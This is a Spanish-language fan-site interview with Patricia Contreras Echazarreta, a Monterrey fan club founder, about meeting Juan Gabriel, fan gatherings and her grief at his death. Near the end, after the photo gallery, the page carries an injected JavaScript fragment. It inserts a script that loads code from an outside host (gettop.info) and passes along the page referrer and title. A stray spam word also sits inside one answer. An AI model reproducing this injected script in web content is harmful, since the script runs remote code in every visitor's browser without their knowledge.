Entrevista: Juan Gabriel, agradezco que nuestros caminos se hayan cruzado

Comparte !

Hoy entrevistamos a Patricia Contreras Echazarreta, una Fan de Monterrey, Nuevo León, México.

 

Patty tuviste la oportunidad de conocer a Juan Gabriel?, recuerdas cual fue la primera canción que escuchaste de él?

Y claro, si tuve la oportunidad y el privilegio de conocerlo. Pues la primer canción que escuche de él, fue justamente la primera que dio a conocer, “No Tengo Dinero.

 

Perteneces o perteneciste a algún Club de Fans? 

En la actualidad pues propiamente no estoy en ningún club, formo parte del gran grupo de amigos que nos hemos ido conociendo a través de tantísimos años.

Yo en 1980 Sí forme mi propio club, le puse por nombre Club “Noa Noa” aquí en mi ciudad, al cabo de un tiempo le cambiamos de nombre por propia sugerencia y deseo del mismo Alberto, le hicimos una sucursal del Club Amigos de México, D.F., el club que presidía mi querida amiga Alejandrta Vargas, así que el club pasó a ser Club Amigos Sucursal Monterrey.

 

Participaste de algunos convivios junto a él? Revive ese momento.

canadianonlinetabs Si tuve la oportunidad de estar presente en el convivio que se le organizó en 1981 por sus 10 años de carrera, eso fue en el Distrito Federal, también estuve en su casa, en Cancún del año 2012, un mágico e inolvidable día y apenas el año pasado, estuve también en San Carlos Sonora, el 07 de julio.

JGCF: Reuniones de Fans
Convivio del año 2012, México

 

JGCF: Reuniones de Fans

 

Desde la primera vez que sentiste una canción de Juan Gabriel hasta la actualidad, el amor, la pasión fue cambiando o es igual desde esos tiempos?

La admiración, el cariño y el respeto de mi hacia Alberto o Juan Gabriel, siempre han sido los mismos desde el día que él llegó a mi vida, jamás han cambiado mis sentimientos hacia él, bueno, pensándolo bien, creo que sí han cambiado, conforme lo conocía, mi admiración y cariño fueron en aumento, para mi no hay nadie más que él, por eso es que hace unos meses que nos enteramos de su fallecimiento, yo igual me sentí morir, me derrumbé pues jamás había pasado por mi mente que algún día, eso podría pasar, es lo más natural, lo se, pero cuando quieres a alguien con todo el corazón, lo imaginas ETERNO.

 

Aquí en mi ciudad, lo vi infinidad de veces, cada vez que él venía a dar algún concierto, no podía yo faltar y aparte siempre tenía la oportunidad de saludarlo en su hotel, porque prácticamente hacíamos “guardia” todo con el propósito de poder verlo aunque fuera un momento, y la mayoría de las veces corrimos con suerte.

 

Si hoy tuvieras la posibilidad de decirle algo que le dirías?

Mmmm tantísimas cosas, que lo extraño, que me hace falta cada día de mi vida, que le agradezco que nuestros caminos se hayan cruzado y haber nacido en el mismo siglo, que no asimilo aún el que ya no este físicamente y que nunca podré olvidarlo, que lo bendigo y le agradezco que mi vida de alguna manera la haya “enriquecido” con su voz, su presencia y su amor.

JGCF: Patricia Contreras Echazarreta
Fan Patricia Contreras Echazarreta junto a Juan Gabriel el 10 de agosto de 1980 en Monterrey, nuevo León, México

 

JGCF: Patricia Contreras Echazarreta
Fan Patricia Contreras Echazarreta junto a Juan Gabriel en abril de 1986, México

 

JGCF: Patricia Contreras Echazarreta
Fan Patricia Contreras Echazarreta en la reunion en el festejo de cumpleaños, año 2016, México

 

Reunión del 07/01/2017 en Monterrey, fecha de cumpleaños de Juan Gabriel.

 

[flagallery gid=31]

document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

shares